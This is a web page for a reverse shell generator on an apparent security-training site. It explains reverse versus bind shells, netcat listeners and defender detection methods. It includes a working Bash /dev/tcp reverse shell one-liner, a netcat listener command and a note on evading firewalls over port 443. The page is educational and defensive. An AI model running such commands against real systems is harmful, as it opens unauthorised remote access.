~/toolsreverse-shell-generator

Reverse Shell Generator

Set your listener IP and port, pick a language, and copy a ready one-liner - built for your own authorized labs.

Apenas para testes de segurança autorizados e fins educacionais. Use somente em sistemas que você possui ou tem permissão explícita para testar.
reverse-shell-generator Local · sem envio
  1. Enter the IP address and port of the listener you control - the machine that will catch the connection.
  2. Pick the language or utility that matches what is available on the target, such as Bash, Python, or PHP.
  3. Copy the generated one-liner and start a matching listener on your own box before you run it.
  4. Everything is assembled locally in your browser - only ever use it on systems you own or are authorised to test.

A reverse shell is a technique where a program on a target machine opens a network connection back out to a listener you control, and then hands your listener an interactive command prompt on that machine. This tool assembles the exact one-liner for you, but it is strictly a learning aid: only run generated payloads against systems you own or have explicit written permission to test, such as HackerDNA lab machines or a signed penetration-testing engagement. Unauthorised access to a computer is a crime in nearly every country. The banner above says the same thing, and this section reinforces it - treat this page as a defensive and educational resource for understanding an attack so you can detect and stop it.

Reverse shell versus bind shell

The difference is who initiates the connection. A bind shell opens a listening port on the target and waits for you to connect inbound. That rarely works in practice, because inbound connections are usually blocked by firewalls and network address translation. A reverse shell flips the direction: the target reaches out to you. Outbound traffic is often permitted with far fewer restrictions than inbound, especially over common ports like 443, so the target connecting back to your listener frequently slips past perimeter controls that would have blocked a bind shell. Understanding why outbound is the easier direction is the whole reason reverse shells are the default choice for this kind of access.

Catching the shell with a listener

The generated command is only half of the picture. Before you run it you must have a listener waiting on the IP and port you entered. The classic tool is Netcat: nc -lvnp 4444 tells it to listen (-l), be verbose (-v), skip DNS resolution (-n), and use the port you specify (-p). When the target runs its one-liner, the connection lands in that Netcat window and you get a prompt. In a controlled lab you might generate a Bash payload such as bash -i >& /dev/tcp/10.10.14.5/4444 0>&1, start nc -lvnp 4444 on the box at 10.10.14.5, and watch the shell appear the moment the target executes it. That end-to-end loop - listener first, payload second - is the mental model to keep.

Why so many languages

There is no single reverse shell that works everywhere, because you can only use what the target already has installed. A minimal container might not have Netcat but will have /bin/bash and its /dev/tcp pseudo-device. A web server running a PHP application gives you a PHP payload. A data science host almost certainly has Python. Windows targets lean on PowerShell. Offering Bash, Python, PHP, Perl, Ruby, and PowerShell variants means you can match the payload to whatever interpreter is present rather than dragging a new binary onto the machine, which is both noisier and often blocked.

How defenders detect and prevent reverse shells

Because this is a defensive resource, the most valuable part is knowing how to stop the technique. Egress filtering is the first line: a host that only needs to serve web pages has no reason to make arbitrary outbound connections, so restricting outbound traffic to known destinations kills most reverse shells outright. Beyond that, monitoring for unusual outbound connections - a database server suddenly dialling out to a random internet address on a high port - is a strong signal. Endpoint detection and response tools flag suspicious process lineage, such as a web server or service account spawning /bin/sh, bash -i, or powershell.exe, which almost never happens in normal operation. Full command-line logging (for example via auditd on Linux or Sysmon on Windows) captures the tell-tale /dev/tcp redirection or encoded PowerShell one-liner so responders can alert on it. Learn to generate these payloads in a lab, then go build the detections that catch them in production.

Perguntas frequentes

What is a reverse shell?
A reverse shell is a connection where the target machine reaches back out to a listener you control, giving you an interactive shell. It is a core post-exploitation technique because outbound connections often bypass inbound firewall rules.
Is it legal to use this?
Only against systems you own or are explicitly authorized to test, such as HackerDNA's labs or a signed penetration-test engagement. Running a reverse shell on a system without permission is a crime. This tool is for education and authorized testing only.
How do I catch the shell?
Start a listener on your machine - for example nc -lvnp 4444 - then run the generated one-liner on the authorized target. The command connects back to your IP and port and hands you a shell. Practice the whole flow safely in our labs.
Which language should I pick?
Use whatever the target already has installed. Bash and sh are near-universal on Linux; Python, PHP, and Perl are common on web servers; PowerShell and nc suit Windows. The generator covers all of these so you can adapt to the environment.
How do defenders detect reverse shells?
By watching for unexpected outbound connections, shells spawning from web-server or service accounts, and known one-liner patterns in process and command logs. Understanding how the payload is built is exactly what helps blue teams write better detections.
Is anything sent to a server?
No. The one-liner is assembled in your browser from the IP and port you enter. Nothing is transmitted or logged by HackerDNA.

Pratique de verdade

Pratique em alvos reais

Transforme essas ferramentas em habilidades com labs práticos e cursos guiados na HackerDNA.

Criar uma conta gratuita
15.000+ Hackers 100+ Labs & Cursos Grátis
Comece Grátis